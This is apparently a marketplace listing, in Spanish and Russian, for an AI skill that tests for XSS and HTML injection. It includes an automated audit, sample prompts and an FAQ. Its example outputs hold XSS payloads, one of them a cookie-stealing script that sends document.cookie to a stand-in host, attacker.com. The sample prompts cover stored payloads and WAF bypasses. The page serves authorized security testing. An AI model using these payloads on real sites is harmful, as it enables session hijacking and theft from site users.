Habilidades xss-html-injection
📦
xss-html-injection
Seguro ⚡
Contiene scripts⚙️
Comandos externos🌐
Acceso a red📁
Acceso al sistema de archivos
Тестирование на уязвимости XSS и HTML-инъекций
Веб-приложения часто содержат уязвимости межсайтового скриптинга и HTML-инъекций, которые злоумышленники используют для кражи сессий и учетных данных. Этот навык предоставляет систематическую методологию обнаружения, эксплуатации и проверки уязвимостей клиентских инъекций в авторизованных оценках безопасности.
Soporta: Claude Codex Code(CC)
1
Descargar el ZIP de la skill
2
Subir en Claude
Ve a Configuración → Capacidades → Skills → Subir skill
3
Activa y empieza a usar
Pruébalo
Usando "xss-html-injection". Тестирование параметра поиска на отраженный XSS
Resultado esperado:
- Уязвимость найдена: Отраженный XSS в параметре /search?q=
- Серьезность: Средняя
- Пейлоад: <img src=x onerror=alert(document.domain)>
- Контекст: HTML body - не кодированное отражение
- Рекомендация: Реализовать выходное кодирование для всех пользовательских данных
Usando "xss-html-injection". Тестирование поля bio в профиле пользователя на хранимый XSS
Resultado esperado:
- Уязвимость найдена: Хранимый XSS в bio профиля пользователя
- Серьезность: Высокая (сохраняется, влияет на всех пользователей)
- Пейлоад: <script>fetch('https://attacker.com/log?c='+document.cookie)</script>
- Воздействие: Перехват сессии всех пользователей, просматривающих профиль
- Рекомендация: Реализовать строгую валидацию ввода и выходное кодирование
Auditoría de seguridad
Segurov1 • 2/25/2026
This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.
1
Archivos escaneados
505
Líneas analizadas
5
hallazgos
1
Auditorías totales
Problemas de riesgo bajo (1)
Educational Security Testing Content - False Positives
All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.
Factores de riesgo
⚡ Contiene scripts (7)
⚙️ Comandos externos (64)
SKILL.md:51-60 SKILL.md:60-65 SKILL.md:65-80 SKILL.md:80-110 SKILL.md:110-117 SKILL.md:117-121 SKILL.md:121-151 SKILL.md:151-158 SKILL.md:158-170 SKILL.md:170-175 SKILL.md:175-181 SKILL.md:181-188 SKILL.md:188-202 SKILL.md:202-207 SKILL.md:207-217 SKILL.md:217-221 SKILL.md:221-234 SKILL.md:234-241 SKILL.md:241-259 SKILL.md:259-264 SKILL.md:264-275 SKILL.md:275-281 SKILL.md:281-297 SKILL.md:297-301 SKILL.md:301-313 SKILL.md:313-317 SKILL.md:317-322 SKILL.md:322-331 SKILL.md:331-333 SKILL.md:333-337 SKILL.md:337-347 SKILL.md:347-352 SKILL.md:352-358 SKILL.md:358-364 SKILL.md:364-365 SKILL.md:365-366 SKILL.md:366-367 SKILL.md:367-368 SKILL.md:368-369 SKILL.md:369-370 SKILL.md:370-373 SKILL.md:373-377 SKILL.md:377-380 SKILL.md:380-392 SKILL.md:392-421 SKILL.md:421-426 SKILL.md:426-431 SKILL.md:431-436 SKILL.md:436-445 SKILL.md:445-447 SKILL.md:447-450 SKILL.md:450-452 SKILL.md:452-455 SKILL.md:455-457 SKILL.md:457-466 SKILL.md:466-468 SKILL.md:468-471 SKILL.md:471-473 SKILL.md:473-482 SKILL.md:482-484 SKILL.md:484-487 SKILL.md:487-489 SKILL.md:489-498 SKILL.md:498
🌐 Acceso a red (27)
SKILL.md:136 SKILL.md:382 SKILL.md:124 SKILL.md:130 SKILL.md:136 SKILL.md:145 SKILL.md:160 SKILL.md:163 SKILL.md:166 SKILL.md:169 SKILL.md:223 SKILL.md:226 SKILL.md:230 SKILL.md:246 SKILL.md:253 SKILL.md:254 SKILL.md:258 SKILL.md:375 SKILL.md:382 SKILL.md:434 SKILL.md:446 SKILL.md:451 SKILL.md:456 SKILL.md:456 SKILL.md:472 SKILL.md:483 SKILL.md:488
📁 Acceso al sistema de archivos (1)
Patrones detectados
Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads
Auditado por: claude
Puntuación de calidad
38
Arquitectura
100
Mantenibilidad
87
Contenido
22
Comunidad
100
Seguridad
87
Cumplimiento de la especificación
Lo que puedes crear
Консультант по безопасности тестирует веб-приложения
Проводить авторизованные пентесты для выявления уязвимостей XSS в клиентских веб-приложениях и предоставлять рекомендации по устранению.
Разработчик проверяет обработку ввода
Тестировать пользовательские веб-приложения во время разработки для проверки правильной очистки ввода и реализованного выходного кодирования.
QA-инженер выполняет регрессионное тестирование безопасности
Включать тестирование XSS и HTML-инъекций в наборы регрессионных тестов безопасности для обнаружения уязвимостей до развертывания в production.
Prueba estos prompts
Базовая детекция XSS
Использовать навык XSS HTML-инъекции для тестирования формы входа на https://example.com на наличие отраженных уязвимостей XSS. Определить все поля ввода и протестировать базовые XSS-пейлоады.
Оценка хранимого XSS
Использовать навык XSS HTML-инъекции для тестирования раздела комментариев на наличие хранимого XSS. Создать тестовые пейлоады, которые сохраняются и выполняются при просмотре другими пользователями.
Обнаружение DOM-based XSS
Использовать навык XSS HTML-инъекции для анализа JavaScript на https://example.com/dashboard на наличие DOM-based XSS. Проверить обработку location.hash и location.search.
Валидация обхода фильтров
Использовать навык XSS HTML-инъекции для тестирования WAF на https://example.com на блокировку распространенных XSS-пейлоадов. Попробовать обход с помощью HTML-кодирования, Unicode-кодирования и вариаций тегов.
Mejores prácticas
- Всегда получайте письменное разрешение перед тестированием любого целевого приложения
- Используйте контролируемые демонстрационные пейлоады, которые не сохраняются и не распространяются на непреднамеренных пользователей
- Немедленно сообщайте о критических уязвимостях через надлежащие каналы реагирования на инциденты
Evitar
- Тестирование production-систем без явного письменного разрешения
- Использование обнаруженных уязвимостей для несанкционированного доступа или эксфильтрации данных
- Развертывание пейлоадов, которые могут вызвать отказ в обслуживании или повреждение системы
Preguntas frecuentes
Выполняет ли этот навык реальные атаки на целевые веб-сайты?
Нет. Этот навык предоставляет методологию и пейлоады для авторизованного тестирования безопасности. Пользователи должны иметь явное письменное разрешение перед тестированием любой системы.
Может ли этот навык тестировать все типы XSS?
Навык охватывает хранимый, отраженный и DOM-based XSS. Однако некоторые продвинутые варианты, такие как мутационный XSS, могут потребовать дополнительных специализированных методов.
Какое разрешение требуется перед использованием этого навыка?
Требуется письменное разрешение от владельца системы. Оно должно включать определенную область применения, разрешенные методы тестирования и процедуры обработки любых захваченных данных.
Работает ли этот навык против приложений с CSP?
CSP может заблокировать многие XSS-пейлоады. Навык включает методы тестирования обхода CSP, но некоторые правильно настроенные политики CSP могут предотвратить успешную эксплуатацию.
Можно ли всегда украсть сессионные cookies через XSS?
Нет. Cookies с флагом HttpOnly недоступны через JavaScript. Современные приложения должны использовать эту защиту для сессионных cookies.
Что делать, если найдена критическая уязвимость XSS?
Немедленно сообщите через надлежащие каналы в соответствии с вашим соглашением об авторизации. Документируйте находку с доказательством концепции и предоставьте рекомендации по устранению владельцу.
Detalles del desarrollador
Autor
sickn33Licencia
MIT
Repositorio
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/xss-html-injectionRef.
main
Estructura de archivos
📄 SKILL.md